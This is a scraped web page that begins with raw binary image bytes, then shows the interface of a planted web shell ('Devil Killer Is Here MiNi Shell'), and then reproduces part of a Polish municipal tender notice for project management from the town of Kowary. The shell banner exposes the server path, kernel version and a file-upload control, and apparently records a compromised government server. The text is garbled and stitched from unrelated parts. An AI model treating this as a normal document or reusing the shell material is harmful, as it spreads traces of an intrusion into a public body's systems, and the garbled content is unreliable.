JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220217/0006008501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zarządzanie projektem, pt.: „Zielono-niebieskie Kowary” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA KOWARY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821598</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 1 Maja 1 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kowary</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-530</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">756439225</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">757613173</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bok@kowary.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.kowary.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zarządzanie projektem, pt.: „Zielono-niebieskie Kowary” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4eab59da-8fce-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00060085</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033328/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Zielono - niebieskie Kowary zadanie dofinansowane ze środków Mechanizmu Finansowego EOG 2014-2021 w ramach programu:„Środowisko, Energia i Zmiany klimatu” obszar programowy: Klimat</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie współfinansowane ze środków Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego w ramach Programu Środowisko, Energia i Zmiany Klimatu – Łagodzenie Zmian Klimatu i adaptacja do ich skutków </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.bip.kowary.pl/public/?id=46967 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">rejestracja na platformie, w tym złożenie oferty w formie elektronicznej, a także warunki techniczne<br/>dotyczące korzystania z Platformy zostały określone w Regulaminie e-Zamówienia, dostępnym pod<br/>adresem https://miniportal.uzp.gov.pl/WarunkiUslugi</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L119 z04.05.2016, str. 1), dalej „RODO”, informuję, że: Administrator, dane kontaktowe Urząd Miasta<br/>Kowary, ul. 1 Maja 1a, 58-530 Kowary: • na adres poczty elektronicznej: bok@kowary.pl, •<br/>telefonicznie:<br/>+48 7564 39 222, • pisemnie lub osobiście: na adres wskazany powyżej, w Urzędzie Miasta Kowary<br/>został wyznaczony Inspektor Ochrony Danych, z którym można się skontaktować: • za pomocą poczty<br/>elektronicznej: iod@kowary.pl Cele przetwarzania,podstawa prawna przetwarzania, czas<br/>przechowywania poszczególnych kategorii danych: Dane<br/>będą przetwarzane przez Urząd Miasta i Kowary wyłącznie w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na podstawie: • art. 6 ust. 1 lit. c) i e) RODO na podstawie Ustawy<br/>z dnia 11września 2019r. prawo zamówień publicznych. Dane będą przechowywane przez okres 4 lat<br/>od zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata,okres przechowywania obejmuje cały czas trwania umowy. Dane mogą zostać udostępnione<br/>osobom lub podmiotom, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18<br/>ustawy z dnia 11 września 2019 r. prawo zamówień publicznych.<br/>Prawa osoby, której dane dotyczą: Przysługujące prawa: • na podstawie art. 15 RODO prawo dostępu<br/>do danych osobowych; • na podstawie art. 16 RODO prawo do sprostowania*; • na podstawie art. 18<br/>RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; • prawo do wniesienia skargi do<br/>Prezesa Urzędu Ochrony Danych Osobowych. Prawa nie mające zastosowania: • w związku z art. 17<br/>ust. 3 lit. b,d lub e RODO prawo do usunięcia danych osobowych; • prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO; • na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6<br/>ust. 1 lit. c RODO. * Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą.** **Wyjaśnienie: W postępowaniu o<br/>udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust.1<br/>rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRM.271.18.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Obowiązkiem Wykonawcy jest zarządzanie projektem prowadzące do osiągnięcia celu projektu oraz wskaźników określonych we wniosku oraz w umowie, a także zapewnienia trwałości projektu zgodnie: z Umową o dofinansowanie projektu, wraz z załącznikami, z obowiązującymi przepisami prawa krajowego i wspólnotowego, w szczególności zasadami polityk wspólnotowych, w tym przepisami dotyczącymi konkurencji, udzielania zamówień publicznych, ochrony środowiska, równouprawnienia kobiet i mężczyzn oraz następującymi ramami prawnymi: <br/> 1) Memorandum of Understanding w sprawie wdrażania Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego na lata 2014-2021 pomiędzy Rzecząpospolitą Polską a Republiką Islandii, Księstwem Liechtensteinu i Królestwem Norwegii (M.P. z 2018 r. poz. 378), zwanym dalej „Memorandum of Understanding”; <br/> 2) Regulacjami w sprawie wdrażania Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego (EOG) na lata 2014-2021 przyjętymi przez Komitet Mechanizmu Finansowego EOG zgodnie z art. 10.5 Protokołu 38c do Umowy o EOG w dniu 8 września 2016 r. i zatwierdzonymi przez Stały Komitet Państw EFTA w dniu 23 września 2016 r., z późn. zm., zwanymi dalej „Regulacjami”; <br/> 3) Umową zawartą pomiędzy Komitetem Mechanizmów Finansowych w Brukseli oraz Ministrem Funduszy i Polityki Regionalnej jako Krajowym Punktem Kontaktowym w sprawie programu: „Środowisko, Energia i Zmiany klimatu” z dnia 7 lutego 2020 r.;<br/> 4) Porozumieniem zawartym pomiędzy Ministrem Funduszy i Polityki Regionalnej jako Krajowym Punktem Kontaktowym oraz Ministrem Klimatu jako Operatorem Programu w sprawie realizacji programu: „Środowisko, Energia i Zmiany klimatu” z dnia 7 lutego 2020 r.; <br/> 5) Porozumieniem ramowym pomiędzy Ministrem Klimatu oraz Narodowym Funduszem Ochrony Środowiska i Gospodarki Wodnej w sprawie realizacji niektórych zadań Operatora Programu dla programu: „Środowisko, Energia i Zmiany klimatu” z dnia 18 kwietnia 2020 r.;<br/> 6) Wytycznymi Ministra Inwestycji i Rozwoju w zakresie udzielania zamówień w ramach Mechanizmu Finansowego EOG na lata 2014-2021 oraz Norweskiego Mechanizmu Finansowego na lata 2014-2021, zwanymi dalej: „Wytycznymi ws. zamówień”;<br/> 7) wszelkimi wytycznymi w zakresie Programu lub MF EOG 2014-2021 przyjętymi przez Narodowy Fundusz, MKiŚ, KPK lub Komitet Mechanizmu Finansowego, zwanymi dalej: „Wytycznymi”.<br/>2.	Wykonawca zobowiązany jest do realizacji zadania zgodnie z opisem i zakresem zadań realizowanych w ramach projektu;<br/>3.	W celu prawidłowego wykonania zadań opisanych poniżej Wykonawca zobowiązany będzie odbywać spotkania robocze z Zamawiającym w trakcie realizacji projektu na każdorazowe polecenie Zamawiającego;<br/>4.	Zadania opisane w pkt 5 winny być wykonane przez Wykonawcę zgodnie z przepisami i wytycznymi oraz ramami prawnymi określonymi w pkt 1.<br/>5. Zamawiający zastrzega sobie prawo do dokonywania kontroli realizacji zadań zleconych oraz wglądu do dokumentacji projektowej.<br/>6. Przedmiotem zamówienia jest usługa zarządzania projektem pt.: „Zielono-niebieskie Kowary” <br/> realizowana w ramach środków Mechanizmu Finansowego Europejskiego Obszaru <br/> Gospodarczego w ramach Programu Środowisko, Energia i Zmiany Klimatu – Łagodzenie Zmian <br/> Klimatu i adaptacja do ich skutków, w następującym zakresie:<br/><br/>I. Zadania dla Koordynatora Projektu - Zarządzanie, realizacja i rozliczanie projektu: <br/>- Zarządzanie, realizacja i rozliczanie projektu - przygotowanie wniosków o płatność oraz rozliczenia końcowego, wprowadzanie dokumentacji w generatorze GWD, wnioski o zaliczki, występowanie o zmiany budżetowe HRF i harmonogramu płatności, monitoring, sprawozdawczość, opracowywanie raportów do Narodowego Funduszu; <br/>- Monitorowanie realizacji projektu zgodnie z harmonogramem rzeczowo-finansowym HRF oraz umową z Narodowym Funduszem;<br/>- Doradztwo w sprawach związanych z realizacją Projektu;<br/>- Przygotowanie raportów wymaganych przez Narodowy Fundusz;<br/>- Uczestniczenie w spotkaniach i naradach organizowanych przez Zamawiającego w trakcie realizacji inwestycji;<br/>- Ochrona interesów Zamawiającego;<br/>- Kontrola opisywania wszelkich dokumentów zgodnie z Regulacjami i Wytycznymi EOG i Narodowego Funduszu;<br/>- Doradztwo w negocjacjach z Wykonawcą inwestycji;<br/>- Sprawowanie kontroli zgodności realizacji inwestycji zgodnie z umową z wykonawcą inwestycji, w tym harmonogramem rzeczowo-finansowym projektu;<br/>- Udział w ewentualnych kontrolach z Narodowym Funduszem;<br/>- W przypadku występowania jakichkolwiek trudności informowanie o powstałych problemach;<br/>- Opracowanie dokumentów mających być w użyciu w ramach realizacji Projektu, zgodnie z wytycznymi EOG i Narodowego Funduszu;<br/>- Monitoring osiąganych wskaźników produktu i rezultatu, w tym wskaźników efektu ekologicznego i informowanie na bieżąco o zagrożeniach w tym zakresie;<br/>- Kontakt z Narodowym Funduszem na podstawie upoważnienia;<br/>- Nadzorowanie i realizacja działań promocyjnych i szkoleniowych, tj.: Działań edukacyjno-informacyjnych; - liczba kampanii 43 szt.; Działań edukacyjno-informacyjnych, aktywizujących społeczność - liczba działań 66 szt.; Działań edukacyjno-informacyjnych, kształcenie i przekaz wiedzy w formie edukacji profilowanej - liczba szkoleń/ wizyt 15 szt.; Działań dot. informacji i komunikacji, promocji projektu - liczba działań promocyjnych 34 szt.<br/><br/>II. Zadania dla Specjalisty ds. zamówień publicznych - Przygotowywanie dokumentacji przetargowej i przeprowadzenie postępowań o udzielenie zamówień publicznych:<br/>Prowadzenie w imieniu zamawiającego wszelkich postępowań w zakresie udzielania zamówień publicznych zgodnie z ustawą Prawo zamówień publicznych (Dz. U z 2021 r. poz. 1129 ze zm.) polegające w szczególności na:<br/>- Przygotowanie planu postępowań o udzielenia zamówień publicznych w każdym roku trwania projektu;<br/>- Szacowanie wartości poszczególnych zadań wynikających z realizacji projektu; <br/>- Przeprowadzanie w imieniu Gminy Miejskiej Kowary postępowań o udzielenia zamówień publicznych dla zadań, których szacunkowa wartość nie przekracza kwoty 130.000,00 zł zgodnie z ZARZĄDZENIEM NR 0050.5.2020 BURMISTRZA MIASTA KOWARY z dnia 11 stycznia 2021 r. w sprawie wprowadzenia Procedury udzielania zamówień publicznych których wartość nie przekracza wyrażonej w złotych kwoty 130.000 zł w Urzędzie Miejskim w Kowarach;<br/>- Przeprowadzanie w imieniu Gminy Miejskiej Kowary postępowań o udzielenie zamówień publicznych, których szacunkowa wartość zamówienia przekracza kwotę 130.000,00 zł (procedura krajowa), oraz zamówień, których szacunkowa wartość przekracza progi unijne, w szczególności polegające na:<br/><br/>- przygotowaniu Specyfikacji Warunków Zamówienia;<br/>- przygotowaniu oraz opublikowaniu ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych lub Dzienniku Urzędowym Unii Europejskiej;<br/>- przygotowaniu odpowiedzi na pytania wykonawców do ogłoszonych postępowań;<br/>- przygotowanie i opublikowanie informacji o maksymalnej kwocie jaką zamawiający zamierza przeznaczyć na realizację zamówienia;<br/>- weryfikacji i analizie złożonych ofert;<br/>- przygotowaniu informacji z otwarcia ofert;<br/>- przekazanie Informacji do Prezesa UZP o złożonych wnioskach i ofertach w postępowaniach;<br/>- wezwaniu wykonawcy do złożenia podmiotowych środków dowodowych zgodnie z przygotowaną wcześniej specyfikacją warunków zamówienia;<br/>- przygotowaniu informacji o wyborze najkorzystniejszej oferty;<br/>- doprowadzenie do zawarcia umowy pomiędzy wykonawcą zadania a Gminą Miejską Kowary;<br/>- przygotowanie oraz opublikowanie Ogłoszenia o wyniku postępowania w Biuletynie Zamówień Publicznych lub Dzienniku Urzędowym Unii Europejskiej; <br/>- przygotowywanie protokołów z postępowań;<br/>- po zrealizowaniu zadania przygotowanie ogłoszenia o wykonaniu umowy w Biuletynie Zamówień Publicznych lub Dzienniku Urzędowym Unii Europejskiej;<br/>- po zakończeniu postępowania przekazania kompletu dokumentów o udzielenia zamówienia publicznego w formie papierowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79420000-4 - Usługi związane z zarządzaniem</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty zostanie dokonany w oparciu o następujące kryteria:<br/><br/>1. cena brutto przedmiotu zamówienia – 60 %<br/><br/>Oferta z najniższą ceną spośród ofert nieodrzuconych otrzyma 60 punktów. Pozostałe proporcjonalnie mniej, według formuły:<br/><br/> Pc <br/><br/>Pc – ilość punktów ofert badanej w kryterium cena,<br/>ano – najniższa cena brutto ze wszystkich ważnych ofert,<br/>ank – cena brutto badanej oferty,<br/><br/><br/>2. doświadczenie Koordynatora projektu – 40%<br/><br/>Doświadczenie Koordynatora projektu wyznaczonego do realizacja zamówienia (D) – waga 40%<br/><br/>Doświadczenie Koordynatora projektu w zarządzaniu projektami dofinansowanymi ze środków pochodzących ze zorganizowanego programu przez ciągły okres co najmniej 12 miesięcy o wartości każdego z projektów min. 2.000.000 zł brutto:<br/>•	min. 2 projekty – 0,00 pkt<br/>•	3 - 4 projekty – 20,00 pkt<br/>•	5 projektów i więcej – 40,00 pkt<br/><br/>3. Łączna liczba punktów badanej oferty będzie liczona według poniższego wzoru:<br/><br/>P = Pc+ D<br/><br/>P- łączna ilość punktów badanej oferty<br/>Pc – ilość punktów badanej oferty w kryterium oceny &#34;cena&#34;<br/>D – ilość punktów badanej oferty w kryterium oceny &#34;doświadczenie&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświaczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/><br/>a) zdolności do występowania w obrocie gospodarczym,<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na podstawie ogólnego oświadczenia o spełnianiu warunków udziału w postępowaniu, zawartego w treści oświadczenia Wykonawcy.<br/><br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na podstawie ogólnego oświadczenia o spełnianiu warunków udziału w postępowaniu, zawartego w treści oświadczenia Wykonawcy, <br/><br/>c) sytuacji ekonomicznej lub finansowej,<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na podstawie ogólnego oświadczenia o spełnianiu warunków udziału w postępowaniu, zawartego w treści oświadczenia Wykonawcy, <br/><br/>d) zdolności technicznej lub zawodowej, <br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że: <br/><br/>w zakresie realizacji usług: <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże należyte wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jednego zamówienia polegającego na świadczeniu usługi zarządzania projektem finansowanym ze środków pochodzących ze zorganizowanego programu o wartości tego projektu nie mniejszej niż 2.000.000,00 zł, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wraz z załączeniem dokumentów potwierdzających należyte wykonanie tych zadań.<br/><br/>w zakresie osób uczestniczących w wykonywaniu zamówienia:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia i będą odpowiedzialnymi za świadczenie usług oraz posiadają wymagane kwalifikacje zawodowe i doświadczenie, niezbędne do wykonania 